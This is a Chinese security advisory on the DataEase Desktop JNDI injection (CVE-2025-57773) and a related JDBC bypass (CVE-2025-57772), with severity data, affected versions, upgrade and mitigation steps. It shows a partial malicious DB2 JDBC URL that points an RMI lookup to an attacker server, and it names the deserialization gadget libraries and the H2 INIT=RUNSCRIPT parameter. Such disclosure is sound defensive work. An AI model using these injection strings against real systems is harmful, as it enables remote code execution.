【漏洞通告】Dataease JNDI注入漏洞(CVE-2025-57773)
发布时间 2025-08-26一、漏洞概述
漏洞名称 | DataEase JNDI注入漏洞 | ||
CVE ID | CVE-2025-57773 | ||
漏洞类型 | RCE | 发现时间 | 2025-08-26 |
漏洞评分 | 8.2 | 漏洞等级 | 高危 |
攻击向量 | 网络 | 所需权限 | 无 |
利用难度 | 低 | 用户交互 | 不需要 |
PoC/EXP | 已公开 | 在野利用 | 未发现 |
DataEase是一款开源的数据可视化与分析平台,支持多种数据源接入,提供报表、看板、可视化大屏等功能,帮助用户实现数据查询、分析与展示。它支持JDBC、API等多种数据连接方式,适用于BI报表、数据分析及可视化场景。
2025年8月26日,启明星辰集团VSRC监测到DataEase Desktop存在DataEase JNDI注入漏洞(CVE-2025-57773)。由于DB2数据源参数缺乏有效校验,攻击者可通过构造恶意JDBC URL(如jdbc:db2://…;clientRerouteServerListJNDIName=rmi://<恶意服务器>),触发JNDI远程加载,并结合commons-collections 4.x与aspectjweaver(<1.9.4)的Gadget链实现反序列化攻击,从而达到任意文件写入或远程代码执行的目的,最终可能完全控制服务器,同时Dataease Desktop还存在Dataease JDBC逻辑绕过漏洞(CVE-2025-57772),由于CalciteProvider#getConnection方法中存在JDBC类型校验缺陷,攻击者可通过伪造数据库类型为oracle,绕过H2驱动相关过滤逻辑,强制程序加载恶意构造的H2 JDBC URL。该URL可直接包含危险参数(如INIT=RUNSCRIPT FROM),实现远程加载并执行恶意SQL脚本,导致敏感数据泄露、系统被控制及进一步横向渗透。
二、影响范围
DataEase Desktop ≤ v2.10.11。
三、安全措施
3.1 升级版本
官方已发布安全补丁,升级至如下版本。
DataEase Desktop ≥v2.10.12。
3.2 临时措施
如果暂时无法升级主程序,可通过将AspectJWeaver升级至≥1.9.4来降低CVE-2025-57773的可利用性,同时建议将commons-collections升级至≥4.4以减少潜在风险。
3.3 通用建议
• 定期更新系统补丁,减少系统漏洞,提升服务器的安全性。
• 加强系统和网络的访问控制,修改防火墙策略,关闭非必要的应用端口或服务,减少将危险服务(如SSH、RDP等)暴露到公网,减少攻击面。
• 使用企业级安全产品,提升企业的网络安全性能。
• 加强系统用户和权限管理,启用多因素认证机制和最小权限原则,用户和软件权限应保持在最低限度。
• 启用强密码策略并设置为定期修改。
3.4 参考链接
https://nvd.nist.gov/vuln/detail/CVE-2025-57773/
https://github.com/dataease/dataease/security/advisories/GHSA-v37q-vh67-9rqv
https://github.com/dataease/dataease/security/advisories/GHSA-7r8j-6whv-4j5p/
京公网安备11010802024551号